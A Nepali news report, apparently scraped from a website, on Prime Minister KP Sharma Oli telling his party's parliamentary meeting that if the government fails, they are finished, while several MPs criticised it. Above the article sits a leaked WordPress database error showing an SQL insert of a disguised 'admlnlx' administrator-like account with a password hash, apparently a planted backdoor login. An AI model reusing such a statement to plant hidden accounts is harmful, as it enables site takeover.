WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJ.jVL0OjWXsE7tBA/EtH7p/lR.kjj.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 18:27:34', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, १७ असार, काठमाडौं । प्रधानमन्त्री केपी शर्मा ओलीले सरकार असफल भए आफूहरु सिद्धिने बताएका छन् । नयाँ बानेश्वरस्थित संसद भवनमा आयोजित नेपाल कम्युनिष्ट पार्टी संसदीय दलको बैठकमा सांसदहरुको प्रश्नको जवाफ दिदै उनले सरकारलाई सफल बनाउनुको विकल्प नभएको भन्दै गल्तीलाई औल्याउने र राम्रा कामलाई प्रोत्साहित गर्न आग्रह समेत गरेका थिए ।
बैठकमा सहभागी एक सांसदका अनुसार प्रधानमन्त्रीले सरकारको सफलता असफलतामै नेपाल कम्युनिष्ट पार्टीको सफलता वा असफलता निर्भर रहेको भन्दै आ आफ्नो ठाउँबाट सकारात्मक र रचनात्मक भूमिका निर्वाह गर्न आग्रह गरेका थिए । प्रधानमन्त्रीको भनाई उदृत गर्दै एक सांसदले भने, सरकार असफल भए हामी पनि सिद्धिन्छौं ।
ओलीले सरकारले ल्याएको विधेयकको बचाउ गरेका थिए । सरकारमाथि विभिन्न कोणबाट आक्रमण भइरहेको भन्दै सबै मिलेर सामना गर्नुपर्ने बताएका थिए । पार्टी एकता चाँडै टुंगिने भन्दै सबै एक भएर जानुपर्नेमा जोड दिएका थिए ।
बैठकमा सोमबार २९ जना सांसदले सरकारको कामकारबाहीको टिपप्णी गर्नुका साथै सुझाव दिएका थिए । अधिकांश सांसदले सरकारको कामकारबाहीको आलोचना गरेका थिए । पार्टीमा गम्भीर छलफल नगरी सरकार अगाडि बढ्न खोजेको भन्दै सांसद घनश्याम भुषाले चर्को आलोचना गरेका थिए । उनले बैठकको औचित्यमाथि प्रश्न गरेका थिए ।
sourse:रिपोर्टर्सनेपाल डटकमबाट